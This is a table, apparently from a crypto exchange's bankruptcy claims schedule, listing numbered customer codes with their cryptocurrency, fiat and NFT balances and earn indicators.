| 07372497 | | BAT[6], BRZ[1], DAI[.00826204], DOGE[6], ETH[.00000043], ETHW[.00000043], GRT[2], LINK[2], SOL[2], SUSHI[6], TRX[4], UNI[1], USD[9800.01], USDT[.14517588] | | |
| 07372498 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07372500 | | USD[10.00] | | |
| 07372501 | | BTC[.00020527], TRX[1], USD[0.00] | | |
| 07372502 | | BRZ[1], DOGE[.00000876], TRX[1], USD[0.00] | | |
| 07372503 | | BRZ[1], CUSDT[2], ETHW[.32505062], GRT[1], SHIB[1], TRX[1], USD[634.63] | | |
| 07372506 | | DOGE[1927.92075763], USD[0.00] | | |
| 07372508 | | ETH[.00472538], ETHW[.00467066], USD[0.00] | Yes | |
| 07372510 | | BAT[0.16586079], BCH[0], BTC[0], CUSDT[13], DOGE[0.00000018], ETH[0], EUR[0.00], GRT[1.08686968], KSHIB[0], LTC[0.00077884], SOL[0], TRX[1.15569293], USD[0.00], USDT[0.00019313] | Yes | |
| 07372511 | | DOGE[141.92070946], USD[0.00] | | |
| 07372514 | | USD[10.00] | | |
| 07372515 | | AUD[0.00], CAD[0.00], CHF[0.00], EUR[0.00], GBP[0.00], HKD[0.00], SHIB[2702766.46766789], USD[0.00] | Yes | |
| 07372516 | | USD[0.00] | | |
| 07372518 | | USD[0.00] | | |
| 07372519 | | USD[10.00] | | |
| 07372520 | | USD[10.00] | | |
| 07372521 | | BAT[2], BRZ[9], BTC[0.01995967], CUSDT[27], DOGE[3203.82853493], ETH[0.28009244], ETHW[0.28009244], GRT[2], LINK[34.19293463], SHIB[7689196.89191603], SUSHI[142.81520077], TRX[1], USD[0.00] | | |
| 07372522 | | BAT[42.36951413], BRZ[4], CUSDT[6], DOGE[393.32349748], ETH[.0476996], ETHW[.04710984], GRT[93.86212252], LINK[1.71227377], LTC[.56294966], SOL[9.89893135], SUSHI[9.87864055], TRX[975.27476896], UNI[6.887957], USD[0.00], USDT[1.08938798] | Yes | |
| 07372523 | | CUSDT[4], TRX[6], USD[0.00], USDT[1.1077369] | Yes | |
| 07372524 | | USD[10.00] | | |
| 07372525 | | USD[2.01], USDT[0] | | |
| 07372526 | | USD[10.00] | | |
| 07372527 | | BRZ[2], BTC[.00005903], CUSDT[7], DOGE[3], ETHW[.00815677], TRX[2], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372528 | | USD[10.00] | | |
| 07372529 | | AVAX[6.5934], BTC[0.00095050], ETH[1.04084200], ETHW[1.04084200], SOL[11.23497650], USD[92.89] | | |
| 07372530 | | BAT[2], BRZ[4], CUSDT[7], DOGE[3], ETH[0], GRT[2], SUSHI[1], TRX[245.71056533], USD[0.01], USDT[1] | | |
| 07372531 | | USD[10.00] | | |
| 07372532 | | SUSHI[.59141402], USD[0.00] | | |
| 07372533 | | USD[10.00] | | |
| 07372534 | | USD[10.00] | | |
| 07372535 | | USD[10.00] | | |
| 07372536 | | CUSDT[3], LTC[.07640929], USD[0.00] | | |
| 07372537 | | USD[10.86] | Yes | |
| 07372538 | | USD[10.00] | | |
| 07372539 | | USD[0.00] | | |
| 07372541 | | CUSDT[7], USD[0.01] | | |
| 07372542 | | BAT[67.17270133], CUSDT[1.00035182], DOGE[1.00049082], MATIC[35.35962822], TRX[1392.23076697], USD[0.02] | | |
| 07372543 | | DOGE[1], TRX[1802.75583817], USD[0.00] | | |
| 07372544 | | BAT[.00320707], BRZ[5.0047968], CUSDT[4], ETH[.00010515], ETHW[.00010515], GRT[4.02043382], LINK[1.07252863], LTC[.06533938], SHIB[2], SOL[.00016397], TRX[13.03781373], UNI[2.14505708], USD[0.00], USDT[4023.58286129] | Yes | |
| 07372545 | | BTC[.00002113], DOGE[45.25078363], LINK[.94889535], TRX[1], UNI[.0004534], USD[0.00] | | |
| 07372546 | | USD[10.00] | | |
| 07372547 | | DOGE[.00008543], USD[0.03], USDT[0] | | |
| 07372548 | | USD[0.00] | | |
| 07372549 | | USD[10.00] | | |
| 07372550 | | USD[10.00] | | |
| 07372551 | | BAT[0], DOGE[1], SOL[0], TRX[1], USD[0.00], USDT[0.08463724] | Yes | |
| 07372552 | | BAT[3], CUSDT[2], DOGE[2], GRT[.00065317], LINK[.00001622], USD[0.00], USDT[1] | | |
| 07372553 | | BAT[24.10239023], USD[0.00] | | |
| 07372554 | | USD[10.00] | | |
| 07372556 | | CUSDT[1], DOGE[23.96365461], USD[0.00] | | |
| 07372557 | | BTC[.00045], USD[10.00] | | |
| 07372558 | | USD[10.00] | | |
| 07372559 | | USD[10.00] | | |
| 07372561 | | DOGE[1], ETH[0], USD[0.00] | Yes | |
| 07372562 | | USD[0.00], USDT[0.00026049] | | |
| 07372563 | | USD[0.00] | | |
| 07372564 | | USD[10.00] | | |
| 07372565 | | USD[10.00] | | |
| 07372566 | | BTC[0], DOGE[0], TRX[0], USD[0.01] | | |
| 07372567 | | DOGE[1539.85491995], TRX[2], USD[0.00] | | |
| 07372568 | | BRZ[1], CUSDT[2], DOGE[.005888], TRX[3], USD[0.62] | | |
| 07372569 | | USD[20.00] | | |
| 07372570 | | BAT[2.0559522], BRZ[1], CUSDT[4], KSHIB[493.0567459], SHIB[1], SOL[.00002792], TRX[2], USD[0.01] | | |
| 07372571 | | DOGE[7.26491351], ETH[.00000002], ETHW[.00000002], KSHIB[10.19580571], SHIB[3], TRX[1], USD[0.00], USDT[.99378478] | Yes | |
| 07372572 | | USD[10.00] | | |
| 07372573 | | DOGE[12121.78782284], NFT [553287263781978447/3D SOLDIER #2509][1], SHIB[88230803.04198755], SOL[52.74686612], USD[2868.62] | Yes | |
| 07372574 | | BTC[0], DOGE[1], ETH[0], USD[0.00] | | |
| 07372575 | | SHIB[371.30172413], USD[0.00], USDT[0] | Yes | |
| 07372577 | | USD[0.00] | | |
| 07372578 | | BAT[2.1253022], BRZ[7.74594861], CUSDT[3], TRX[5], USD[0.00], USDT[1.106564] | Yes | |
| 07372579 | | USD[10.00] | | |
| 07372580 | | USD[10.00] | | |
| 07372581 | | BRZ[0], BTC[0], DOGE[8.42344625], ETH[0], GRT[0], TRX[20.14648424], USD[0.00], USDT[0] | | |
| 07372582 | | BTC[0], SHIB[1], USD[0.01] | Yes | |
| 07372583 | | CUSDT[1], DOGE[1], TRX[177.02744025], USD[0.00] | | |
| 07372584 | | CUSDT[1], DOGE[183.33416955], TRX[1063.23105216], USD[0.00] | Yes | |
| 07372585 | | DOGE[1.0000071], USD[46.63] | | |
| 07372586 | | DOGE[0], GRT[0], USD[0.00] | Yes | |
| 07372587 | | GRT[2.24841429], TRX[89.16023717], USD[0.00] | | |
| 07372588 | | BAT[0], CUSDT[0], DOGE[0], KSHIB[0], PAXG[0], SHIB[87470.60738883], SOL[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07372589 | | BRZ[3], CUSDT[5], DOGE[1], TRX[8], USD[0.01], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372590 | | USD[10.00] | | |
| 07372591 | | USD[10.00] | | |
| 07372593 | | USD[10.00] | | |
| 07372595 | | USD[0.00] | | |
| 07372596 | | USD[10.00] | | |
| 07372597 | | LINK[.00105628], USD[0.00] | Yes | |
| 07372598 | | USD[10.00] | | |
| 07372599 | | USD[0.00] | | |
| 07372600 | | DOGE[3], TRX[638.72337082], UNI[1.23873976], USD[0.00] | | |
| 07372601 | | CUSDT[1], DOGE[1.05300739], USD[428.62] | Yes | |
| 07372602 | | BRZ[3], CUSDT[1], SHIB[1], USD[614.03] | Yes | |
| 07372603 | | USD[10.00] | | |
| 07372604 | | USD[10.00] | | |
| 07372605 | | USD[0.00] | | |
| 07372606 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07372607 | | USD[10.00] | | |
| 07372608 | | CUSDT[4], DOGE[0], ETH[0], NFT (35614003812809876/Caddy Shack #2 of 3)[1], NFT (369292946012782504/Dino )[1], NFT (477367083102062016/Pug family #2 of 2)[1], NFT (517227792705328768/CryptoAvatar #46)[1], NFT (534648661683121319/Carmen #23)[1], NFT (552909998058958533/Fallen Traveler #06)[1], NFT (557652803355890294/Infinity #20)[1], TRX[0], USD[0.00], USDT[0] | | |
| 07372611 | | DOGE[31.50365462], TRX[1], USD[0.00] | | |
| 07372612 | | USD[10.00] | | |
| 07372613 | | BTC[.00016831], USD[0.00] | | |
| 07372614 | | USD[10.00] | | |
| 07372615 | | USD[10.00] | | |
| 07372616 | | USD[10.00] | | |
| 07372617 | | USD[10.00] | | |
| 07372618 | | BRZ[0], DOGE[0], ETH[0], GRT[0], SHIB[121457.12667259], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07372619 | | DOGE[501.65902815], USD[10.00] | | |
| 07372620 | | USD[10.00] | | |
| 07372621 | | USD[10.00] | | |
| 07372622 | | USD[10.00] | | |
| 07372623 | | NFT (55344982735599514/Entrance Voucher #2582)[1], TRX[1], USD[105.75] | | |
| 07372624 | | USD[10.00] | | |
| 07372625 | | BCH[0], DOGE[1813.78964441], ETH[.05164048], ETHW[0.05099751], KSHIB[8113.20098615], SHIB[8094244.51263308], TRX[126.14825516], USD[0.00], USDT[0] | Yes | |
| 07372626 | | TRX[1], USD[0.00] | | |
| 07372627 | | USD[10.00] | | |
| 07372628 | | SHIB[531616.55667124], USD[0.00] | | |
| 07372629 | | CUSDT[1], ETH[0], USD[0.00] | Yes | |
| 07372630 | | DOGE[19.8824169], ETH[.00212525], ETHW[.00212525], GRT[1.69899834], TRX[10.84828778], USD[3.17], USDT[0.00000001] | | |
| 07372631 | | USD[10.00] | | |
| 07372632 | | USD[10.00] | | |
| 07372633 | | GRT[4.2011341], USD[0.00] | | |
| 07372634 | | USD[10.00] | | |
| 07372635 | | BAT[1], BRZ[1], CUSDT[3], GRT[3], TRX[5], USD[0.00], USDT[2] | | |
| 07372636 | | DOGE[136.25370439], USD[0.00] | | |
| 07372637 | | CUSDT[5], SOL[.00007329], UNI[7.95486523], USD[2.30] | Yes | |
| 07372639 | | CUSDT[2], DOGE[143.03294295], USD[0.00] | Yes | |
| 07372641 | | DOGE[1], TRX[2], USD[580.67] | Yes | |
| 07372642 | | USD[10.00] | | |
| 07372643 | | BRZ[4], CUSDT[2], TRX[2], USD[0.00], USDT[0] | | |
| 07372644 | | BRZ[1], DOGE[279.48113840], USD[0.00] | | |
| 07372646 | | USD[10.00] | | |
| 07372647 | | USD[0.08] | Yes | |
| 07372648 | | USD[0.02] | | |
| 07372649 | | USD[396.59] | | |
| 07372651 | | USD[10.00] | | |
| 07372653 | | DOGE[1], SHIB[1], TRX[1], USD[70.02] | Yes | |
| 07372656 | | DOGE[25.84937424], USD[0.00] | | |
| 07372657 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372658 | | DOGE[2], USD[0.01] | | |
| 07372659 | | USD[0.00] | Yes | |
| 07372660 | | USD[10.77] | Yes | |
| 07372662 | | USD[10.00] | | |
| 07372663 | | USD[10.00] | | |
| 07372664 | | DOGE[2413.30924212], USD[10.00] | | |
| 07372665 | | BRZ[.0000066], CAD[0.00], CUSDT[1047.71240291], DOGE[830.74814755], ETH[0.02344593], ETHW[0.02315865], LTC[.10506177], SUSHI[.54795574], TRX[428.0862933], USD[0.00] | Yes | |
| 07372666 | | USD[10.00] | | |
| 07372667 | | BRZ[1], DOGE[59.66747811], ETH[.00478991], ETHW[.00473519], TRX[144.26538634], USD[0.01] | Yes | |
| 07372668 | | BAT[1], CUSDT[1], DOGE[1], SOL[.00003557], USD[0.01] | | |
| 07372669 | | USD[10.00] | | |
| 07372670 | | USD[10.00] | | |
| 07372671 | | USD[10.00] | | |
| 07372672 | | USD[10.00] | | |
| 07372673 | | SOL[.9510952], USD[0.00] | Yes | |
| 07372674 | | BTC[0], CUSDT[9.00007073], DOGE[1801.91214924], ETH[.00000001], TRX[0.00002164], USD[0.00] | | |
| 07372675 | | LTC[0], USD[8.06], USDT[0.00000001] | | |
| 07372676 | | BAT[12.31914706], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], TRX[3.57524906], USD[0.00], USDT[0] | | |
| 07372678 | | USD[10.00] | | |
| 07372679 | | USD[0.00] | | |
| 07372680 | | BRZ[2], CUSDT[4], DOGE[2.0000361], NFT (31165508391130485S/Geckos Spaceship)[1], NFT (406456348868973666/GGSG Brawler Skin)[1], NFT (416522377528941504/Geckos Spaceship)[1], NFT (538503427519752564/Galactic Gecko #8013)[1], SOL[.00000868], USD[0.00] | | |
| 07372682 | | USD[0.00] | | |
| 07372683 | | BAT[0], BRZ[0], CUSDT[2], DOGE[85.90210407], ETH[0], GRT[0], LINK[0], USD[0.00], USDT[0] | | |
| 07372684 | | USD[10.00] | | |
| 07372687 | | BRZ[1], CUSDT[13], DOGE[1], ETH[.00000103], ETHW[.00000103], NFT (376425337659870489/FTX - Off The Grid Miami #1333)[1], NFT (397219221323957767/Australia Ticket Stub #2147)[1], USD[0.00] | Yes | |
| 07372689 | | BRZ[1], CUSDT[1], SHIB[582352.81564272], USD[0.00] | Yes | |
| 07372690 | | USD[10.00] | | |
| 07372691 | | USD[10.00] | | |
| 07372692 | | USD[0.00] | | |
| 07372693 | | BTC[0], USD[10.00] | | |
| 07372695 | | USD[0.00] | | |
| 07372696 | | USD[10.00] | | |
| 07372697 | | CUSDT[1], USD[0.00], YFI[.00269157] | Yes | |
| 07372698 | | CUSDT[1], TRX[358.54220446], USD[10.00] | | |
| 07372699 | | BTC[0], TRX[169.8921695], USD[0.00] | Yes | |
| 07372701 | | BF_POINT[300], BTC[0], DOGE[0], ETH[0], SHIB[16273396.94126207], USD[0.36] | Yes | |
| 07372702 | | DOGE[1], USD[0.01] | | |
| 07372703 | | CUSDT[2], DOGE[966.34119421], TRX[63.9321353], USD[44.01] | | |
| 07372705 | | USD[10.00] | | |
| 07372706 | | USD[10.00] | | |
| 07372707 | | CUSDT[2], USD[0.00], USDT[0] | | |
| 07372710 | | CUSDT[3], USD[11.61] | | |
| 07372711 | | USD[10.00] | | |
| 07372713 | | CUSDT[1], USD[0.00] | Yes | |
| 07372714 | | USD[0.00] | Yes | |
| 07372715 | | DOGE[0.50535192], GRT[0], USD[1.88] | | |
| 07372716 | | USD[0.01] | | |
| 07372719 | | USD[1.98] | | |
| 07372720 | | USD[10.00] | | |
| 07372721 | | BRZ[2], CUSDT[4], DOGE[2], SOL[.30329025], TRX[3], USD[490.17] | | |
| 07372722 | | USD[14.92] | | |
| 07372723 | | USD[10.00] | | |
| 07372724 | | USD[10.00] | | |
| 07372725 | | BAT[1.0165555], BRZ[2], DOGE[1640.2128011], GRT[1.00498957], KSHIB[31229.76294439], NFT (296665052157546971/Hall of Fantasy League #169)[1], NFT (324322008104227609/Hall of Fantasy League #181)[1], NFT (326101189441372825/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #44)[1], NFT (396556902731852470/Pug Love #12)[1], NFT (402083578400053D7/Surreal World #52)[1], NFT (429249996475270936/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #48)[1], NFT (483785198800093825/Surreal World #44)[1], NFT (485109513287471145/Vox World #12)[1], SHIB[234272664.50173889], TRX[1], USD[0.00], USDT[1.08535627] | Yes | |
| 07372726 | | USD[10.37] | Yes | |
| 07372727 | | BAT[1], BRZ[1], BTC[0], CUSDT[3], DOGE[167.33191053], SUSHI[1], TRX[3], UNI[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372728 | | BAT[1], CUSDT[6], ETH[.00000004], ETHW[.00000004], LINK[0], TRX[2], USD[146.82] | | |
| 07372730 | | USD[10.00] | | |
| 07372731 | | USD[10.00] | | |
| 07372733 | | USD[10.00] | | |
| 07372734 | | USD[10.00] | | |
| 07372735 | | DOGE[.92102165], USD[0.00] | | |
| 07372736 | | TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07372737 | | USD[10.00] | | |
| 07372739 | | TRX[123.55673379], USD[0.00] | | |
| 07372740 | | USD[13.90] | | |
| 07372741 | | BRZ[53.02718125], USD[0.00] | | |
| 07372742 | | USD[10.00] | | |
| 07372743 | | USD[10.00] | | |
| 07372744 | | CUSDT[1], DOGE[.04894572], TRX[1], USD[24.37] | | |
| 07372745 | | BAT[1.0165555], BTC[0], GRT[3.1552529], SOL[3.29170728], SUSHI[2.19447146], TRX[4], USD[0.00], USDT[4.38894305] | Yes | |
| 07372746 | | USD[10.00] | | |
| 07372748 | | USD[0.03] | | |
| 07372749 | | USD[10.00] | | |
| 07372750 | | ETH[.03898775], ETHW[.03898775], TRX[25.68942467], USD[1969.48], USDT[1616.15838853] | | |
| 07372751 | | USD[0.01], USDT[0] | | |
| 07372754 | | USD[10.00] | | |
| 07372755 | | USD[10.00] | | |
| 07372756 | | SOL[.00000001], USD[0.77] | | |
| 07372757 | | DOGE[122.0955901], USD[0.00] | | |
| 07372758 | | DOGE[373.84679848], SHIB[150855.18672509], SOL[.0836907], TRX[212.77296545], USD[0.00] | Yes | |
| 07372759 | | USD[10.00] | | |
| 07372761 | | USD[10.00] | | |
| 07372762 | | BTC[.00021423], TRX[1], USD[0.00] | | |
| 07372763 | | USD[10.00] | | |
| 07372764 | | DOGE[41.05445409], USD[0.00] | | |
| 07372765 | | BTC[0], LTC[0], USD[0.06] | | |
| 07372767 | | USD[10.00] | | |
| 07372768 | | USD[0.01], USDT[0] | Yes | |
| 07372769 | | DOGE[49394.59184871], GRT[4.3988903], TRX[1], USD[0.00] | Yes | |
| 07372770 | | BAT[1.01655549], BRZ[2], CUSDT[5], DOGE[2], TRX[9], USD[0.48] | Yes | |
| 07372771 | | USD[0.00] | | |
| 07372772 | | BTC[.00129628], CUSDT[1], USD[10.00] | | |
| 07372773 | | BAT[17.93742951], USD[0.00] | | |
| 07372775 | | CUSDT[2], DOGE[21173.77221116], GRT[53.72305965], TRX[1], USD[0.01], USDT[0.99108624] | Yes | |
| 07372778 | | USD[11.09] | Yes | |
| 07372779 | | USD[10.00] | | |
| 07372780 | | GRT[2.80355061], LINK[.24011201], USD[0.00] | | |
| 07372781 | | BAT[.00005897], CUSDT[.0000516], DOGE[1], GRT[0.00009536], LINK[.00083843], SOL[0.00007523], TRX[1], USD[0.01] | | |
| 07372782 | | USD[10.00] | | |
| 07372785 | | USD[10.00] | | |
| 07372787 | | USD[10.00] | | |
| 07372788 | | CUSDT[3], TRX[2], USD[0.01] | | |
| 07372789 | | USD[0.15] | | |
| 07372790 | | USD[10.00] | | |
| 07372793 | | BTC[0], CUSDT[3], DOGE[0.00003697], ETH[0], LTC[0], SHIB[1], TRX[1], USD[0.00] | | |
| 07372794 | | TRX[4.55906696], USD[0.00] | | |
| 07372795 | | TRX[211.58329685], USD[0.00] | | |
| 07372796 | | CUSDT[1], LTC[.04236942], USD[0.00] | | |
| 07372797 | | BTC[.0004], ETH[0], NFT (563760920745056655/Entrance Voucher #29543)[1], SHIB[1093746.38744266], TRX[.001554], USD[0.00] | | |
| 07372799 | | USD[2.33] | | |
| 07372800 | | USD[10.00] | | |
| 07372801 | | USD[10.00] | | |
| 07372804 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372805 | | USD[10.00] | | |
| 07372806 | | GRT[4.66877514], USD[0.00] | Yes | |
| 07372807 | | CUSDT[1], DOGE[3], TRX[1], USD[0.00] | | |
| 07372809 | | USD[10.00] | | |
| 07372810 | | USD[10.00] | | |
| 07372811 | | BCH[0], BTC[0.00017733], ETH[0], SOL[0.46667067], USD[0.00] | | |
| 07372812 | | GRT[4.41570615], USD[0.00] | Yes | |
| 07372813 | | USD[10.00] | | |
| 07372814 | | USD[10.00] | | |
| 07372815 | | USD[10.00] | | |
| 07372816 | | USD[10.00] | | |
| 07372817 | | BRZ[1], BTC[0], CUSDT[2], DOGE[2], USD[0.00] | | |
| 07372818 | | USD[10.00] | | |
| 07372819 | | BTC[0], CUSDT[3], ETHW[.33619312], GRT[1], TRX[6], USD[1466.25], USDT[0] | | |
| 07372820 | | USD[10.00] | | |
| 07372821 | | DOGE[22.73010684], USD[0.00] | | |
| 07372822 | | USD[0.00] | | |
| 07372823 | | DOGE[1], TRX[1], USD[207.99], USDT[0.00002507] | | |
| 07372824 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07372825 | | TRX[176.30198131], USD[0.00] | | |
| 07372827 | | USD[10.00] | | |
| 07372828 | | USD[10.00] | | |
| 07372829 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[5035.63], USDT[0] | Yes | |
| 07372830 | | BTC[0], DOGE[0], ETH[0], SHIB[.00000001], USD[0.00], USDT[0] | Yes | |
| 07372831 | | AUD[1.97], GRT[99.9], NFT (33539807378279911B/Sigma Shark #963)[1], SOL[.681005], TRX[599.4], UNI[.7719], USD[4.43], USDT[0.12969967] | | |
| 07372832 | | USD[10.00] | | |
| 07372833 | | BRZ[1], CUSDT[20], DOGE[1931.34920875], GRT[8.14798859], KSHIB[562.97707909], SUSHI[1.86083863], TRX[3806.64487068], USD[0.00] | Yes | |
| 07372834 | | USD[10.00] | | |
| 07372835 | | DOGE[4], SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07372837 | | USD[10.00] | | |
| 07372838 | | USD[10.00] | | |
| 07372839 | | TRX[.000001] | | |
| 07372840 | | USD[10.00] | | |
| 07372841 | | USD[0.01] | | |
| 07372842 | | BAT[1.00717627], BRZ[1], BTC[0], CUSDT[3], DOGE[1], ETH[0], GRT[0], LINK[0], LTC[0.00000923], SHIB[9], SOL[0], SUSHI[0], TRX2.00040390], UNI[0], USD[1.46], USDT[0] | Yes | |
| 07372843 | | USD[10.00] | | |
| 07372844 | | USD[10.00] | | |
| 07372845 | | USD[0.06] | | |
| 07372846 | | BTC[.000007], USD[0.00] | | |
| 07372847 | | CUSDT[1], DOGE[.00085935], TRX[1], USD[4.67] | | |
| 07372848 | | DOGE[222.48277501], SHIB[75746.53985755], TRX[0], USD[0.00] | Yes | |
| 07372850 | | ETHW[.00062571], USD[0.79] | | |
| 07372851 | | BTC[.00064061], DOGE[99.01636442], LTC[.07390165], TRX[1], USD[0.00], USDT[2.98202995] | | |
| 07372852 | | USD[10.00] | | |
| 07372853 | | USD[10.00] | | |
| 07372854 | | BRZ[1], CUSDT[2], TRX[1], USD[0.00] | Yes | |
| 07372855 | | BRZ[3], CUSDT[2], GRT[1.00404471], TRX[4], USD[0.01] | Yes | |
| 07372856 | | USD[10.00] | | |
| 07372857 | | USD[10.00] | | |
| 07372858 | | USD[10.00] | | |
| 07372859 | | USD[10.00] | | |
| 07372860 | | BRZ[2], CUSDT[2], GRT[31.56559532], TRX[1], USD[0.01] | | |
| 07372862 | | BTC[.03991967], DOGE[24331.28933541], GRT[1], SHIB[730488.0304317], TRX[3], USD[0.00], USDT[1] | | |
| 07372864 | | USD[10.00] | | |
| 07372865 | | USD[0.00] | | |
| 07372867 | | CUSDT[3], DOGE[361.21703492], USD[0.00] | Yes | |
| 07372868 | | LTC[1.11122582], USD[1.18] | | |
| 07372869 | | BAT[10.03504889], BRZ[4], CUSDT[20], DOGE[.01345895], LINK[.0001038], MATIC[116.48518361], SOL[1.90974609], TRX[1359.4959721], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372870 | | USD[10.00] | | |
| 07372871 | | USD[10.00] | | |
| 07372872 | | USD[10.00] | | |
| 07372873 | | USD[10.00] | | |
| 07372874 | | USD[10.00] | | |
| 07372876 | | USD[10.00] | | |
| 07372877 | | USD[10.00] | | |
| 07372878 | | USD[10.00] | | |
| 07372880 | | DOGE[.00000001], SHIB[5780057837.52042549], USD[0.00], USDT[0] | | |
| 07372881 | | BTC[0], CUSDT[2.00106749], DOGE[0], USD[0.00] | Yes | |
| 07372882 | | USD[10.00] | | |
| 07372883 | | USD[10.00] | | |
| 07372884 | | SOL[0], USD[0.00] | | |
| 07372885 | | DOGE[1], USD[0.00] | | |
| 07372887 | | USD[10.00] | | |
| 07372888 | | BTC[0.00038636], TRX[1], USD[0.00] | | |
| 07372889 | | SHIB[59306.38232613], USD[0.00] | | |
| 07372890 | | CUSDT[6], USD[0.76] | | |
| 07372891 | | BTC[0.47522705], ETH[.0002658], ETHW[.0002658], LINK[.046], SOL[.01554], SUSHI[.119], UNI[.098], USD[0.84], USDT[7959.55619538], YFI[.0007] | | |
| 07372892 | | BCH[0], GRT[0], TRX[0], USD[0.00] | | |
| 07372893 | | DOGE[1], SHIB[2], USD[0.00] | Yes | |
| 07372894 | | CUSDT[3], DOGE[4520.5221952], USD[0.03] | Yes | |
| 07372895 | | USD[10.00] | | |
| 07372897 | | BRZ[585.648], CUSDT[3811.692], DAI[49.7004], DOGE[11182.013], LTC[.996], PAXG[.0269916], SHIB[300000], SUSHI[3.486], TRX[4858.938], USD[7.27], USDT[9.581035] | | |
| 07372898 | | USD[880.00] | | |
| 07372901 | | USD[10.00] | | |
| 07372902 | | USD[10.00] | | |
| 07372903 | | AAVE[.00531993], ALGO[2.56440816], BCH[.00419005], BRZ[9.91262975], BTC[.00006311], CUSDT[13], DOGE[21.29094092], GRT[1.38690631], MATIC[1.99933508], SHIB[50703.90099691], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07372904 | | USD[10.00] | | |
| 07372905 | | CUSDT[3], NFT (491418634592118865/Hall of Fantasy League #196)[1], NFT (515118605914579536/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #22)[1], NFT (538402179938275495/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #60)[1], SHIB[947529.77730486], TRX[.00034623], USD[3.95] | Yes | |
| 07372906 | | DOGE[0], EUR[0.00], SHIB[9180735.74087970], USD[0.00] | Yes | |
| 07372907 | | USD[10.00] | | |
| 07372908 | | BCH[.00001838], LINK[0.31850277], USD[0.00] | | |
| 07372909 | | USD[10.00] | | |
| 07372910 | | BRZ[1], CUSDT[2], DOGE[1070.60884814], ETH[.00664502], ETHW[.00656294], LTC[.00000001], TRX[135.62760235], USD[0.00] | Yes | |
| 07372911 | | USD[10.00] | | |
| 07372914 | | DOGE[1], USD[14.02] | | |
| 07372915 | | USD[10.00] | | |
| 07372916 | | BAT[0], DOGE[0], LINK[0], TRX[0], UNI[0], USD[0.00] | | |
| 07372917 | | USD[10.00] | | |
| 07372918 | | USD[10.00] | | |
| 07372919 | | USD[10.00] | | |
| 07372920 | | DOGE[23.60025473], USD[0.00] | | |
| 07372921 | | USD[10.00] | | |
| 07372922 | | USD[10.00] | | |
| 07372923 | | USD[10.00] | | |
| 07372924 | | DOGE[31.49127834], USD[0.00] | Yes | |
| 07372925 | | USD[10.00] | | |
| 07372926 | | USD[10.00] | | |
| 07372930 | | USD[10.00] | | |
| 07372932 | | USD[10.00] | | |
| 07372935 | | LINK[47.7268], LTC[.000566], TRX[.625242], USD[0.44], USDT[0.00000186] | | |
| 07372936 | | USD[10.00] | | |
| 07372937 | | USD[0.01] | | |
| 07372940 | | BRZ[4], CUSDT[7], DOGE[3], GRT[1], SHIB[17244446.11562751], SOL[.93031216], SUSHI[1.06851699], TRX[1], USD[0.00], USDT[3.17515625] | Yes | |
| 07372941 | | SUSHI[.68115039], USD[0.00] | | |
| 07372942 | | USD[10.00] | | |
| 07372943 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372944 | | BTC[.00018195], USD[0.00] | | |
| 07372945 | | AAVE[0], AVAX[0.00004790], BAT[0.00028752], BRZ[1], BTC[0], CUSDT[2], DOGE[0], ETH[0.00000125], ETHW[0], KSHIB[0], LINK[0], MATIC[0], NEAR[0], NFT (434492023191380166/Entrance Voucher #3602)[1], SHIB[0], SOL[0], SUSHI[0], TRX[2], UNI[0], USD[0.00], USDT[0.02307473] | Yes | |
| 07372946 | | USD[10.00] | | |
| 07372948 | | BAT[0], DOGE[1.00001003], USD[0.05] | | |
| 07372949 | | USD[10.00] | | |
| 07372951 | | BTC[.00039568], SGD[19.66], TRX[79.18414986], USD[2.00] | | |
| 07372955 | | BTC[.00011186], SOL[14.1432] | | |
| 07372956 | | CUSDT[6], DOGE[1], GRT[1.00367791], TRX[2], USD[0.00] | Yes | |
| 07372957 | | CUSDT[3], USD[2.83] | | |
| 07372958 | | BTC[.00840255], CUSDT[8], DOGE[1008.129809], ETH[.23081648], ETHW[.23081648], TRX[1], USD[0.00] | | |
| 07372959 | | USD[10.00] | | |
| 07372961 | | USD[10.00] | | |
| 07372962 | | USD[10.00] | | |
| 07372963 | | USD[10.00] | | |
| 07372964 | | USD[0.00] | | |
| 07372966 | | USD[10.00] | | |
| 07372967 | | USD[10.00] | | |
| 07372968 | | USD[10.00] | | |
| 07372971 | | CUSDT[1], TRX[57.89608856], USD[0.00] | | |
